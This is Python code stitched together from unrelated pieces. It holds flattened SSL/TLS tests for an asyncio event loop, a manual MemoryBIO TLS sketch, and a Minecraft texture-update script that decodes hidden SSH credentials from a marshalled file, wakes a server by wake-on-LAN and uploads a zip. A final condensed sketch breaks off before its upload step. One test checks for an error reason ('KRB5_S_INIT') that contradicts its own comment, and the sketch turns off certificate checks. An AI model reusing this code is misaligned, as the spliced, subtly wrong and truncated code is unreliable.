ssl.SSLError: pass finally: sock.close() orig_sock.close() async def client(addr): reader, writer = await asyncio.open_connection( *addr, ssl=client_sslctx, server_hostname='', loop=self.loop) self.assertEqual(await reader.readline(), b'A\n') writer.write(b'B') with self.assertRaises(ssl.SSLError): await reader.readline() writer.close() return 'OK' with self.tcp_server(server, max_clients=1, backlog=1) as srv: res = self.loop.run_until_complete(client(srv.addr)) self.assertEqual(res, 'OK') def test_start_tls_client_reg_proto_1(self): if self.implementation == 'asyncio': raise unittest.SkipTest() HELLO_MSG = b'1' * self.PAYLOAD_SIZE server_context = self._create_server_ssl_context( self.ONLYCERT, self.ONLYKEY) client_context = self._create_client_ssl_context() def serve(sock): sock.settimeout(self.TIMEOUT) data = sock.recv_all(len(HELLO_MSG)) self.assertEqual(len(data), len(HELLO_MSG)) sock.starttls(server_context, server_side=True) sock.sendall(b'O') data = sock.recv_all(len(HELLO_MSG)) self.assertEqual(len(data), len(HELLO_MSG)) sock.unwrap() sock.close() class ClientProto(asyncio.Protocol): def __init__(self, on_data, on_eof): self.on_data = on_data self.on_eof = on_eof self.con_made_cnt = 0 def connection_made(proto, tr): proto.con_made_cnt += 1 # Ensure connection_made gets called only once. 
self.assertEqual(proto.con_made_cnt, 1) def data_received(self, data): self.on_data.set_result(data) def eof_received(self): self.on_eof.set_result(True) async def client(addr): await asyncio.sleep(0.5, loop=self.loop) on_data = self.loop.create_future() on_eof = self.loop.create_future() tr, proto = await self.loop.create_connection( lambda: ClientProto(on_data, on_eof), *addr) tr.write(HELLO_MSG) new_tr = await self.loop.start_tls(tr, proto, client_context) self.assertEqual(await on_data, b'O') new_tr.write(HELLO_MSG) await on_eof new_tr.close() with self.tcp_server(serve, timeout=self.TIMEOUT) as srv: self.loop.run_until_complete( asyncio.wait_for(client(srv.addr), loop=self.loop, timeout=10)) def test_create_connection_memory_leak(self): if self.implementation == 'asyncio': raise unittest.SkipTest() HELLO_MSG = b'1' * self.PAYLOAD_SIZE server_context = self._create_server_ssl_context( self.ONLYCERT, self.ONLYKEY) client_context = self._create_client_ssl_context() def serve(sock): sock.settimeout(self.TIMEOUT) sock.starttls(server_context, server_side=True) sock.sendall(b'O') data = sock.recv_all(len(HELLO_MSG)) self.assertEqual(len(data), len(HELLO_MSG)) sock.unwrap() sock.close() class ClientProto(asyncio.Protocol): def __init__(self, on_data, on_eof): self.on_data = on_data self.on_eof = on_eof self.con_made_cnt = 0 def connection_made(proto, tr): # XXX: We assume user stores the transport in protocol proto.tr = tr proto.con_made_cnt += 1 # Ensure connection_made gets called only once. self.assertEqual(proto.con_made_cnt, 1) def data_received(self, data): self.on_data.set_result(data) def eof_received(self): self.on_eof.set_result(True) async def client(addr): await asyncio.sleep(0.5, loop=self.loop) on_data = self.loop.create_future() on_eof = self.loop.create_future() tr, proto = await self.loop.create_connection( lambda: ClientProto(on_data, on_eof), *addr, ssl=client_context) self.assertEqual(await on_data, b'O') tr.write(HELLO_MSG) await on_eof tr.close() with self.tcp_server(serve, timeout=self.TIMEOUT) as srv: self.loop.run_until_complete( asyncio.wait_for(client(srv.addr), loop=self.loop, timeout=10)) # No garbage is left for SSL client from loop.create_connection, even # if user stores the SSLTransport in corresponding protocol instance client_context = weakref.ref(client_context) self.assertIsNone(client_context()) def test_start_tls_client_buf_proto_1(self): if self.implementation == 'asyncio': raise unittest.SkipTest() HELLO_MSG = b'1' * self.PAYLOAD_SIZE server_context = self._create_server_ssl_context( self.ONLYCERT, self.ONLYKEY) client_context = self._create_client_ssl_context() client_con_made_calls = 0 def serve(sock): sock.settimeout(self.TIMEOUT) data = sock.recv_all(len(HELLO_MSG)) self.assertEqual(len(data), len(HELLO_MSG)) sock.starttls(server_context, server_side=True) sock.sendall(b'O') data = sock.recv_all(len(HELLO_MSG)) self.assertEqual(len(data), len(HELLO_MSG)) sock.sendall(b'2') data = sock.recv_all(len(HELLO_MSG)) self.assertEqual(len(data), len(HELLO_MSG)) sock.unwrap() sock.close() class ClientProtoFirst(asyncio.BaseProtocol): def __init__(self, on_data): self.on_data = on_data self.buf = bytearray(1) def connection_made(self, tr): nonlocal client_con_made_calls client_con_made_calls += 1 def get_buffer(self, sizehint): return self.buf def buffer_updated(self, nsize): assert nsize == 1 self.on_data.set_result(bytes(self.buf[:nsize])) def eof_received(self): pass class ClientProtoSecond(asyncio.Protocol): def __init__(self, on_data, on_eof): 
self.on_data = on_data self.on_eof = on_eof self.con_made_cnt = 0 def connection_made(self, tr): nonlocal client_con_made_calls client_con_made_calls += 1 def data_received(self, data): self.on_data.set_result(data) def eof_received(self): self.on_eof.set_result(True) async def client(addr): await asyncio.sleep(0.5, loop=self.loop) on_data1 = self.loop.create_future() on_data2 = self.loop.create_future() on_eof = self.loop.create_future() tr, proto = await self.loop.create_connection( lambda: ClientProtoFirst(on_data1), *addr) tr.write(HELLO_MSG) new_tr = await self.loop.start_tls(tr, proto, client_context) self.assertEqual(await on_data1, b'O') new_tr.write(HELLO_MSG) new_tr.set_protocol(ClientProtoSecond(on_data2, on_eof)) self.assertEqual(await on_data2, b'2') new_tr.write(HELLO_MSG) await on_eof new_tr.close() # connection_made() should be called only once -- when # we establish connection for the first time. Start TLS # doesn't call connection_made() on application protocols. self.assertEqual(client_con_made_calls, 1) with self.tcp_server(serve, timeout=self.TIMEOUT) as srv: self.loop.run_until_complete( asyncio.wait_for(client(srv.addr), loop=self.loop, timeout=self.TIMEOUT)) def test_start_tls_slow_client_cancel(self): if self.implementation == 'asyncio': raise unittest.SkipTest() HELLO_MSG = b'1' * self.PAYLOAD_SIZE client_context = self._create_client_ssl_context() server_waits_on_handshake = self.loop.create_future() def serve(sock): sock.settimeout(self.TIMEOUT) data = sock.recv_all(len(HELLO_MSG)) self.assertEqual(len(data), len(HELLO_MSG)) try: self.loop.call_soon_threadsafe( server_waits_on_handshake.set_result, None) data = sock.recv_all(1024 * 1024) except ConnectionAbortedError: pass finally: sock.close() class ClientProto(asyncio.Protocol): def __init__(self, on_data, on_eof): self.on_data = on_data self.on_eof = on_eof self.con_made_cnt = 0 def connection_made(proto, tr): proto.con_made_cnt += 1 # Ensure connection_made gets called only once. 
self.assertEqual(proto.con_made_cnt, 1) def data_received(self, data): self.on_data.set_result(data) def eof_received(self): self.on_eof.set_result(True) async def client(addr): await asyncio.sleep(0.5, loop=self.loop) on_data = self.loop.create_future() on_eof = self.loop.create_future() tr, proto = await self.loop.create_connection( lambda: ClientProto(on_data, on_eof), *addr) tr.write(HELLO_MSG) await server_waits_on_handshake with self.assertRaises(asyncio.TimeoutError): await asyncio.wait_for( self.loop.start_tls(tr, proto, client_context), 0.5, loop=self.loop) with self.tcp_server(serve, timeout=self.TIMEOUT) as srv: self.loop.run_until_complete( asyncio.wait_for(client(srv.addr), loop=self.loop, timeout=10)) def test_start_tls_server_1(self): if self.implementation == 'asyncio': raise unittest.SkipTest() HELLO_MSG = b'1' * self.PAYLOAD_SIZE server_context = self._create_server_ssl_context( self.ONLYCERT, self.ONLYKEY) client_context = self._create_client_ssl_context() def client(sock, addr): sock.settimeout(self.TIMEOUT) sock.connect(addr) data = sock.recv_all(len(HELLO_MSG)) self.assertEqual(len(data), len(HELLO_MSG)) sock.starttls(client_context) sock.sendall(HELLO_MSG) sock.unwrap() sock.close() class ServerProto(asyncio.Protocol): def __init__(self, on_con, on_eof, on_con_lost): self.on_con = on_con self.on_eof = on_eof self.on_con_lost = on_con_lost self.data = b'' def connection_made(self, tr): self.on_con.set_result(tr) def data_received(self, data): self.data += data def eof_received(self): self.on_eof.set_result(1) def connection_lost(self, exc): if exc is None: self.on_con_lost.set_result(None) else: self.on_con_lost.set_exception(exc) async def main(proto, on_con, on_eof, on_con_lost): tr = await on_con tr.write(HELLO_MSG) self.assertEqual(proto.data, b'') new_tr = await self.loop.start_tls( tr, proto, server_context, server_side=True, ssl_handshake_timeout=self.TIMEOUT) await on_eof await on_con_lost self.assertEqual(proto.data, HELLO_MSG) new_tr.close() async def run_main(): on_con = self.loop.create_future() on_eof = self.loop.create_future() on_con_lost = self.loop.create_future() proto = ServerProto(on_con, on_eof, on_con_lost) server = await self.loop.create_server( lambda: proto, '127.0.0.1', 0) addr = server.sockets[0].getsockname() with self.tcp_client(lambda sock: client(sock, addr), timeout=self.TIMEOUT): await asyncio.wait_for( main(proto, on_con, on_eof, on_con_lost), loop=self.loop, timeout=self.TIMEOUT) server.close() await server.wait_closed() self.loop.run_until_complete(run_main()) def test_create_server_ssl_over_ssl(self): if self.implementation == 'asyncio': raise unittest.SkipTest('asyncio does not support SSL over SSL') CNT = 0 # number of clients that were successful TOTAL_CNT = 25 # total number of clients that test will create TIMEOUT = 10.0 # timeout for this test A_DATA = b'A' * 1024 * 1024 B_DATA = b'B' * 1024 * 1024 sslctx_1 = self._create_server_ssl_context(self.ONLYCERT, self.ONLYKEY) client_sslctx_1 = self._create_client_ssl_context() sslctx_2 = self._create_server_ssl_context(self.ONLYCERT, self.ONLYKEY) client_sslctx_2 = self._create_client_ssl_context() clients = [] async def handle_client(reader, writer): nonlocal CNT data = await reader.readexactly(len(A_DATA)) self.assertEqual(data, A_DATA) writer.write(b'OK') data = await reader.readexactly(len(B_DATA)) self.assertEqual(data, B_DATA) writer.writelines([b'SP', bytearray(b'A'), memoryview(b'M')]) await writer.drain() writer.close() CNT += 1 class 
ServerProtocol(asyncio.StreamReaderProtocol): def connection_made(self, transport): super_ = super() transport.pause_reading() fut = self._loop.create_task(self._loop.start_tls( transport, self, sslctx_2, server_side=True)) def cb(_): try: tr = fut.result() except Exception as ex: super_.connection_lost(ex) else: super_.connection_made(tr) fut.add_done_callback(cb) def server_protocol_factory(): reader = asyncio.StreamReader(loop=self.loop) protocol = ServerProtocol(reader, handle_client, loop=self.loop) return protocol async def test_client(addr): fut = asyncio.Future(loop=self.loop) def prog(sock): try: sock.connect(addr) sock.starttls(client_sslctx_1) # because wrap_socket() doesn't work correctly on # SSLSocket, we have to do the 2nd level SSL manually incoming = ssl.MemoryBIO() outgoing = ssl.MemoryBIO() sslobj = client_sslctx_2.wrap_bio(incoming, outgoing) def do(func, *args): while True: try: rv = func(*args) break except ssl.SSLWantReadError: if outgoing.pending: sock.send(outgoing.read()) incoming.write(sock.recv(65536)) if outgoing.pending: sock.send(outgoing.read()) return rv do(sslobj.do_handshake) do(sslobj.write, A_DATA) data = do(sslobj.read, 2) self.assertEqual(data, b'OK') do(sslobj.write, B_DATA) data = b'' while True: chunk = do(sslobj.read, 4) if not chunk: break data += chunk self.assertEqual(data, b'SPAM') do(sslobj.unwrap) sock.close() except Exception as ex: self.loop.call_soon_threadsafe(fut.set_exception, ex) sock.close() else: self.loop.call_soon_threadsafe(fut.set_result, None) client = self.tcp_client(prog) client.start() clients.append(client) await fut async def start_server(): extras = {} if self.implementation != 'asyncio' or self.PY37: extras = dict(ssl_handshake_timeout=10.0) srv = await self.loop.create_server( server_protocol_factory, '127.0.0.1', 0, family=socket.AF_INET, ssl=sslctx_1, **extras) try: srv_socks = srv.sockets self.assertTrue(srv_socks) addr = srv_socks[0].getsockname() tasks = [] for _ in range(TOTAL_CNT): tasks.append(test_client(addr)) await asyncio.wait_for( asyncio.gather(*tasks, loop=self.loop), TIMEOUT, loop=self.loop) finally: self.loop.call_soon(srv.close) await srv.wait_closed() with self._silence_eof_received_warning(): self.loop.run_until_complete(start_server()) self.assertEqual(CNT, TOTAL_CNT) for client in clients: client.stop() def test_renegotiation(self): if self.implementation == 'asyncio': raise unittest.SkipTest('asyncio does not support renegotiation') CNT = 0 TOTAL_CNT = 25 A_DATA = b'A' * 1024 * 1024 B_DATA = b'B' * 1024 * 1024 sslctx = openssl_ssl.Context(openssl_ssl.SSLv23_METHOD) if hasattr(openssl_ssl, 'OP_NO_SSLV2'): sslctx.set_options(openssl_ssl.OP_NO_SSLV2) sslctx.use_privatekey_file(self.ONLYKEY) sslctx.use_certificate_chain_file(self.ONLYCERT) client_sslctx = self._create_client_ssl_context() def server(sock): conn = openssl_ssl.Connection(sslctx, sock) conn.set_accept_state() data = b'' while len(data) < len(A_DATA): try: chunk = conn.recv(len(A_DATA) - len(data)) if not chunk: break data += chunk except openssl_ssl.WantReadError: pass self.assertEqual(data, A_DATA) conn.renegotiate() if conn.renegotiate_pending(): conn.send(b'OK') else: conn.send(b'ER') data = b'' while len(data) < len(B_DATA): try: chunk = conn.recv(len(B_DATA) - len(data)) if not chunk: break data += chunk except openssl_ssl.WantReadError: pass self.assertEqual(data, B_DATA) if conn.renegotiate_pending(): conn.send(b'ERRO') else: conn.send(b'SPAM') conn.shutdown() async def client(addr): extras = {} if self.implementation != 'asyncio' 
or self.PY37: extras = dict(ssl_handshake_timeout=10.0) reader, writer = await asyncio.open_connection( *addr, ssl=client_sslctx, server_hostname='', loop=self.loop, **extras) writer.write(A_DATA) self.assertEqual(await reader.readexactly(2), b'OK') writer.write(B_DATA) self.assertEqual(await reader.readexactly(4), b'SPAM') nonlocal CNT CNT += 1 writer.close() async def client_sock(addr): sock = socket.socket() sock.connect(addr) reader, writer = await asyncio.open_connection( sock=sock, ssl=client_sslctx, server_hostname='', loop=self.loop) writer.write(A_DATA) self.assertEqual(await reader.readexactly(2), b'OK') writer.write(B_DATA) self.assertEqual(await reader.readexactly(4), b'SPAM') nonlocal CNT CNT += 1 writer.close() sock.close() def run(coro): nonlocal CNT CNT = 0 with self.tcp_server(server, max_clients=TOTAL_CNT, backlog=TOTAL_CNT) as srv: tasks = [] for _ in range(TOTAL_CNT): tasks.append(coro(srv.addr)) self.loop.run_until_complete( asyncio.gather(*tasks, loop=self.loop)) self.assertEqual(CNT, TOTAL_CNT) with self._silence_eof_received_warning(): run(client) with self._silence_eof_received_warning(): run(client_sock) def test_shutdown_timeout(self): if self.implementation == 'asyncio': raise unittest.SkipTest() CNT = 0 # number of clients that were successful TOTAL_CNT = 25 # total number of clients that test will create TIMEOUT = 10.0 # timeout for this test A_DATA = b'A' * 1024 * 1024 sslctx = self._create_server_ssl_context(self.ONLYCERT, self.ONLYKEY) client_sslctx = self._create_client_ssl_context() clients = [] async def handle_client(reader, writer): nonlocal CNT data = await reader.readexactly(len(A_DATA)) self.assertEqual(data, A_DATA) writer.write(b'OK') await writer.drain() writer.close() with self.assertRaisesRegex(asyncio.TimeoutError, 'SSL shutdown timed out'): await reader.read() CNT += 1 async def test_client(addr): fut = asyncio.Future(loop=self.loop) def prog(sock): try: sock.starttls(client_sslctx) sock.connect(addr) sock.send(A_DATA) data = sock.recv_all(2) self.assertEqual(data, b'OK') data = sock.recv(1024) self.assertEqual(data, b'') fd = sock.detach() try: select.select([fd], [], [], 3) finally: os.close(fd) except Exception as ex: self.loop.call_soon_threadsafe(fut.set_exception, ex) else: self.loop.call_soon_threadsafe(fut.set_result, None) client = self.tcp_client(prog) client.start() clients.append(client) await fut async def start_server(): extras = {} if self.implementation != 'asyncio' or self.PY37: extras['ssl_handshake_timeout'] = 10.0 if self.implementation != 'asyncio': # or self.PY38 extras['ssl_shutdown_timeout'] = 0.5 srv = await asyncio.start_server( handle_client, '127.0.0.1', 0, family=socket.AF_INET, ssl=sslctx, loop=self.loop, **extras) try: srv_socks = srv.sockets self.assertTrue(srv_socks) addr = srv_socks[0].getsockname() tasks = [] for _ in range(TOTAL_CNT): tasks.append(test_client(addr)) await asyncio.wait_for( asyncio.gather(*tasks, loop=self.loop), TIMEOUT, loop=self.loop) finally: self.loop.call_soon(srv.close) await srv.wait_closed() with self._silence_eof_received_warning(): self.loop.run_until_complete(start_server()) self.assertEqual(CNT, TOTAL_CNT) for client in clients: client.stop() def test_shutdown_cleanly(self): if self.implementation == 'asyncio': raise unittest.SkipTest() CNT = 0 TOTAL_CNT = 25 A_DATA = b'A' * 1024 * 1024 sslctx = self._create_server_ssl_context(self.ONLYCERT, self.ONLYKEY) client_sslctx = self._create_client_ssl_context() def server(sock): sock.starttls( sslctx, server_side=True) data = 
sock.recv_all(len(A_DATA)) self.assertEqual(data, A_DATA) sock.send(b'OK') sock.unwrap() sock.close() async def client(addr): extras = {} if self.implementation != 'asyncio' or self.PY37: extras = dict(ssl_handshake_timeout=10.0) reader, writer = await asyncio.open_connection( *addr, ssl=client_sslctx, server_hostname='', loop=self.loop, **extras) writer.write(A_DATA) self.assertEqual(await reader.readexactly(2), b'OK') self.assertEqual(await reader.read(), b'') nonlocal CNT CNT += 1 writer.close() def run(coro): nonlocal CNT CNT = 0 with self.tcp_server(server, max_clients=TOTAL_CNT, backlog=TOTAL_CNT) as srv: tasks = [] for _ in range(TOTAL_CNT): tasks.append(coro(srv.addr)) self.loop.run_until_complete( asyncio.gather(*tasks, loop=self.loop)) self.assertEqual(CNT, TOTAL_CNT) with self._silence_eof_received_warning(): run(client) def test_write_to_closed_transport(self): if self.implementation == 'asyncio': raise unittest.SkipTest() sslctx = self._create_server_ssl_context(self.ONLYCERT, self.ONLYKEY) client_sslctx = self._create_client_ssl_context() future = None def server(sock): sock.starttls(sslctx, server_side=True) sock.shutdown(socket.SHUT_RDWR) sock.close() def unwrap_server(sock): sock.starttls(sslctx, server_side=True) while True: try: sock.unwrap() break except ssl.SSLError as ex: # Since OpenSSL 1.1.1, it raises "application data after # close notify" if ex.reason == 'KRB5_S_INIT': break except OSError as ex: # OpenSSL < 1.1.1 if ex.errno != 0: raise sock.close() async def client(addr): nonlocal future future = self.loop.create_future() reader, writer = await asyncio.open_connection( *addr, ssl=client_sslctx, server_hostname='', loop=self.loop) writer.write(b'I AM WRITING NOWHERE1' * 100) try: data = await reader.read() self.assertEqual(data, b'') except (ConnectionResetError, BrokenPipeError): pass for i in range(25): writer.write(b'I AM WRITING NOWHERE2' * 100) self.assertEqual( writer.transport.get_write_buffer_size(), 0) await future def run(meth): def wrapper(sock): try: meth(sock) except Exception as ex: self.loop.call_soon_threadsafe(future.set_exception, ex) else: self.loop.call_soon_threadsafe(future.set_result, None) return wrapper with self._silence_eof_received_warning(): with self.tcp_server(run(server)) as srv: self.loop.run_until_complete(client(srv.addr)) with self.tcp_server(run(unwrap_server)) as srv: self.loop.run_until_complete(client(srv.addr)) def test_flush_before_shutdown(self): if self.implementation == 'asyncio': raise unittest.SkipTest() CHUNK = 1024 * 128 SIZE = 32 sslctx = self._create_server_ssl_context(self.ONLYCERT, self.ONLYKEY) sslctx_openssl = openssl_ssl.Context(openssl_ssl.SSLv23_METHOD) if hasattr(openssl_ssl, 'OP_NO_SSLV2'): sslctx_openssl.set_options(openssl_ssl.OP_NO_SSLV2) sslctx_openssl.use_privatekey_file(self.ONLYKEY) sslctx_openssl.use_certificate_chain_file(self.ONLYCERT) client_sslctx = self._create_client_ssl_context() future = None def server(sock): sock.starttls(sslctx, server_side=True) self.assertEqual(sock.recv_all(4), b'ping') sock.send(b'pong') time.sleep(0.5) # hopefully stuck the TCP buffer data = sock.recv_all(CHUNK * SIZE) self.assertEqual(len(data), CHUNK * SIZE) sock.close() def openssl_server(sock): conn = openssl_ssl.Connection(sslctx_openssl, sock) conn.set_accept_state() while True: try: data = conn.recv(16384) self.assertEqual(data, b'ping') break except openssl_ssl.WantReadError: pass # use renegotiation to queue data in peer _write_backlog conn.renegotiate() conn.send(b'pong') data_size = 0 while True: try: 
chunk = conn.recv(16384) if not chunk: break data_size += len(chunk) except openssl_ssl.WantReadError: pass except openssl_ssl.ZeroReturnError: break self.assertEqual(data_size, CHUNK * SIZE) def run(meth): def wrapper(sock): try: meth(sock) except Exception as ex: self.loop.call_soon_threadsafe(future.set_exception, ex) else: self.loop.call_soon_threadsafe(future.set_result, None) return wrapper async def client(addr): nonlocal future future = self.loop.create_future() reader, writer = await asyncio.open_connection( *addr, ssl=client_sslctx, server_hostname='', loop=self.loop) writer.write(b'ping') data = await reader.readexactly(4) self.assertEqual(data, b'pong') for _ in range(SIZE): writer.write(b'x' * CHUNK) writer.close() try: data = await reader.read() self.assertEqual(data, b'') except ConnectionResetError: pass await future with self.tcp_server(run(server)) as srv: self.loop.run_until_complete(client(srv.addr)) with self.tcp_server(run(openssl_server)) as srv: self.loop.run_until_complete(client(srv.addr)) def test_remote_shutdown_receives_trailing_data(self): if self.implementation == 'asyncio': raise unittest.SkipTest() CHUNK = 1024 * 128 SIZE = 32 sslctx = self._create_server_ssl_context(self.ONLYCERT, self.ONLYKEY) client_sslctx = self._create_client_ssl_context() future = None def server(sock): incoming = ssl.MemoryBIO() outgoing = ssl.MemoryBIO() sslobj = sslctx.wrap_bio(incoming, outgoing, server_side=True) while True: try: sslobj.do_handshake() except ssl.SSLWantReadError: if outgoing.pending: sock.send(outgoing.read()) incoming.write(sock.recv(16384)) else: if outgoing.pending: sock.send(outgoing.read()) break while True: try: data = sslobj.read(4) except ssl.SSLWantReadError: incoming.write(sock.recv(16384)) else: break self.assertEqual(data, b'ping') sslobj.write(b'pong') sock.send(outgoing.read()) time.sleep(0.2) # wait for the peer to fill its backlog # send close_notify but don't wait for response with self.assertRaises(ssl.SSLWantReadError): sslobj.unwrap() sock.send(outgoing.read()) # should receive all data data_len = 0 while True: try: chunk = len(sslobj.read(16384)) data_len += chunk except ssl.SSLWantReadError: incoming.write(sock.recv(16384)) except ssl.SSLZeroReturnError: break self.assertEqual(data_len, CHUNK * SIZE) # verify that close_notify is received sslobj.unwrap() sock.close() def eof_server(sock): sock.starttls(sslctx, server_side=True) self.assertEqual(sock.recv_all(4), b'ping') sock.send(b'pong') time.sleep(0.2) # wait for the peer to fill its backlog # send EOF sock.shutdown(socket.SHUT_WR) # should receive all data data = sock.recv_all(CHUNK * SIZE) self.assertEqual(len(data), CHUNK * SIZE) sock.close() async def client(addr): nonlocal future future = self.loop.create_future() reader, writer = await asyncio.open_connection( *addr, ssl=client_sslctx, server_hostname='', loop=self.loop) writer.write(b'ping') data = await reader.readexactly(4) self.assertEqual(data, b'pong') # fill write backlog in a hacky way - renegotiation won't help for _ in range(SIZE): writer.transport._test__append_write_backlog(b'x' * CHUNK) try: data = await reader.read() self.assertEqual(data, b'') except (BrokenPipeError, ConnectionResetError): pass await future def run(meth): def wrapper(sock): try: meth(sock) except Exception as ex: self.loop.call_soon_threadsafe(future.set_exception, ex) else: self.loop.call_soon_threadsafe(future.set_result, None) return wrapper with self.tcp_server(run(server)) as srv: self.loop.run_until_complete(client(srv.addr)) with 
self.tcp_server(run(eof_server)) as srv: self.loop.run_until_complete(client(srv.addr)) def test_connect_timeout_warning(self): s = socket.socket(socket.AF_INET) s.bind(('127.0.0.1', 0)) addr = s.getsockname() async def test(): try: await asyncio.wait_for( self.loop.create_connection(asyncio.Protocol, *addr, ssl=True), 0.1, loop=self.loop) except (ConnectionRefusedError, asyncio.TimeoutError): pass else: self.fail('TimeoutError is not raised') with s: try: with self.assertWarns(ResourceWarning) as cm: self.loop.run_until_complete(test()) gc.collect() gc.collect() gc.collect() except AssertionError as e: self.assertEqual(str(e), 'ResourceWarning not triggered') else: self.fail('Unexpected ResourceWarning: {}'.format(cm.warning)) def test_handshake_timeout_handler_leak(self): if self.implementation == 'asyncio': # Okay this turns out to be an issue for asyncio.sslproto too raise unittest.SkipTest() s = socket.socket(socket.AF_INET) s.bind(('127.0.0.1', 0)) s.listen(1) addr = s.getsockname() async def test(ctx): try: await asyncio.wait_for( self.loop.create_connection(asyncio.Protocol, *addr, ssl=ctx), 0.1, loop=self.loop) except (ConnectionRefusedError, asyncio.TimeoutError): pass else: self.fail('TimeoutError is not raised') with s: ctx = ssl.create_default_context() self.loop.run_until_complete(test(ctx)) ctx = weakref.ref(ctx) # SSLProtocol should be DECREF to 0 self.assertIsNone(ctx()) def test_shutdown_timeout_handler_leak(self): loop = self.loop def server(sock): sslctx = self._create_server_ssl_context(self.ONLYCERT, self.ONLYKEY) sock = sslctx.wrap_socket(sock, server_side=True) sock.recv(32) sock.close() class Protocol(asyncio.Protocol): def __init__(self): self.fut = asyncio.Future(loop=loop) def connection_lost(self, exc): self.fut.set_result(None) async def client(addr, ctx): tr, pr = await loop.create_connection(Protocol, *addr, ssl=ctx) tr.close() await pr.fut with self.tcp_server(server) as srv: ctx = self._create_client_ssl_context() loop.run_until_complete(client(srv.addr, ctx)) ctx = weakref.ref(ctx) if self.implementation == 'asyncio': # asyncio has no shutdown timeout, but it ends up with a circular # reference loop - not ideal (introduces gc glitches), but at least # not leaking gc.collect() gc.collect() gc.collect() # SSLProtocol should be DECREF to 0 self.assertIsNone(ctx()) class Test_UV_TCPSSL(_TestSSL, tb.UVTestCase): pass class Test_AIO_TCPSSL(_TestSSL, tb.AIOTestCase): pass
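# A minimal, self-contained sketch (separate from the test suite above) of the
# ssl.MemoryBIO pumping pattern the tests use to drive TLS by hand over a plain
# socket (see the do(...) helper in test_client and the MemoryBIO servers).
# The address and the permissive client context are placeholder assumptions;
# a real run needs an actual TLS server to connect to.
import socket
import ssl


def pump(sock, incoming, outgoing, func, *args):
    # Retry an SSLObject operation, shuttling ciphertext between the memory
    # BIOs and the socket until the operation completes.
    while True:
        try:
            result = func(*args)
            break
        except ssl.SSLWantReadError:
            if outgoing.pending:
                sock.send(outgoing.read())
            incoming.write(sock.recv(65536))
    if outgoing.pending:
        sock.send(outgoing.read())
    return result


def manual_tls_ping(addr):
    ctx = ssl.create_default_context()
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE  # acceptable for a sketch, not for production
    incoming, outgoing = ssl.MemoryBIO(), ssl.MemoryBIO()
    sslobj = ctx.wrap_bio(incoming, outgoing)
    with socket.create_connection(addr) as sock:
        pump(sock, incoming, outgoing, sslobj.do_handshake)
        pump(sock, incoming, outgoing, sslobj.write, b'ping')
        return pump(sock, incoming, outgoing, sslobj.read, 4)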
Update_MODS_TEXTURES.py
from wakeonlan import send_magic_packet from fabric import Connection import marshal import types import threading from queue import Queue import socket import time import base64 import sys import paramiko.ssh_exception def starting_module(c_q): print("###########################################") print("## UPDATE TEXTURES - V3.0 ##") print("## AUTHOR - MAFIOSI ##") print("###########################################") print() print("[WARNING] DO NOT CLOSE THE PROGRAM WHILE IT'S RUNNING") time.sleep(2) print() print("[STATE] Checking file configs.pyc availability....") try: s = open('configs.pyc', 'rb') print("[RESULT] File configs.pyc found") print() except: print("[RESULT] Move file configs.pyc to the same folder as this EXECUTABLE") c_q.put(2) return s.seek(12) olives = marshal.load(s) garden = types.ModuleType("Garden") exec(olives,garden.__dict__) alpha = base64.decodebytes(bytes(garden.pick(1))) beta = base64.decodebytes(bytes(garden.pick(2))) gamma = base64.decodebytes(bytes(garden.pick(3))) delta = base64.decodebytes(bytes(garden.pick(4))) x = 9 alpha = alpha.decode() beta = beta.decode() gamma = gamma.decode() delta = delta.decode() # CONNECTION VARIABLES server = Connection(host=gamma, user=alpha, port=22, connect_kwargs={"password": beta}) command = 'nohup screen -S mine -d -m python3 Internal_MManager.py &' # TIME PC TAKES TO TURN ON zzz = 50 verify = False ########################################## ########## MAIN PROGRAM ########## ########################################## while True: print('[STATE] Looking up server info...') try: time.sleep(1) i = socket.gethostbyname(gamma) time.sleep(1) print('[RESULT] Server OK') print() except (Exception, ConnectionResetError, socket.timeout, paramiko.ssh_exception.SSHException) as err: print("[RESULT] Server info could not be retrieved, try again later") c_q.put(3) return # TELLS PC TO TURN ON print('[STATE] Checking if Server is ON...') try: send_magic_packet(delta, ip_address=i, port=x) except (Exception, ConnectionResetError, socket.timeout, paramiko.ssh_exception.SSHException) as err: error = err print("[RESULT] Server cannot be turned ON, try again later") c_q.put(4) return # CHECKS IF PC IS ALREADY ON AND CONNECTS try: server.run('ls', hide=True) verify = server.is_connected except (Exception, ConnectionResetError, socket.timeout, paramiko.ssh_exception.SSHException) as err: print("[RESULT] Server is turned off --> Turning it ON...") if not verify: print("[ACTION] Sending Magic Packets") print("[ACTION] Waiting for Server to turn ON. 
ETA: ~60 sec") print("[WARNING] Program should Work even with Traceback error - Cause (missing useless repositories)") time.sleep(zzz) try: server.run('ls', hide=True) verify = server.is_connected if verify: print("[RESULT] Server is turned ON") print() else: print("[RESULT] Server cannot be turned ON, try again later") c_q.put(5) return except (Exception, ConnectionResetError, socket.timeout, paramiko.ssh_exception.SSHException) as err: error = err print("[RESULT] Server cannot be turned ON, try again later") c_q.put(5) return else: print("[RESULT] Server is Turned ON") print() # TRY TO TRANSFER FILES TO PC print("[STATE] Transferring Files") try: server.put('D:\Projects\Minecraft_Server_Management\Zip_File_Distribution\TEXTURES_ONLY.zip', '/opt/Transfer/Distribution') print("[RESULT] Files Transferred Sucessfully") print() c_q.put(1) break except: print("[RESULT] Files could not be transferred") c_q.put(6) break return ########################################## ########## MAIN ROUTINE ########## ########################################## def main(): sys.tracebacklimit = None close_queue= Queue() thread_start_server = threading.Thread(name='Start_Server', target=starting_module, daemon=True, args=(close_queue,)) thread_start_server.start() # WAITS FOR THREAD TO GIVE OUTPUT (BAD OR GOOD) while True: state = close_queue.get() if state == 1: print('[RESULT] IT EXECUTED SUCCESSFULLY - YOU MAY CLOSE THE PROGRAM') time.sleep(8) return else: print("ERROR: " + str(state)) print('[WARNING] PLEASE WARN DEVELOPER OF ERROR NUMBER (or just move the damn configs file)') time.sleep(8) return if __name__ == '__main__': main()
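# A condensed sketch of the wake-then-transfer flow implemented above: send a
# wake-on-LAN magic packet, wait for the host to boot, verify the Fabric SSH
# connection, then upload the archive. Host, credentials, MAC address and file
# paths are placeholders, not the real values decoded from configs.pyc.
import time

from fabric import Connection
from wakeonlan import send_magic_packet


def wake_and_upload(host, user, password, mac, local_zip, remote_dir, boot_wait=50):
    conn = Connection(host=host, user=user, port=22,
                      connect_kwargs={"password": password})
    try:
        conn.run('ls', hide=True)              # already reachable?
    except Exception:
        send_magic_packet(mac, ip_address=host, port=9)
        time.sleep(boot_wait)                  # give the machine time to boot
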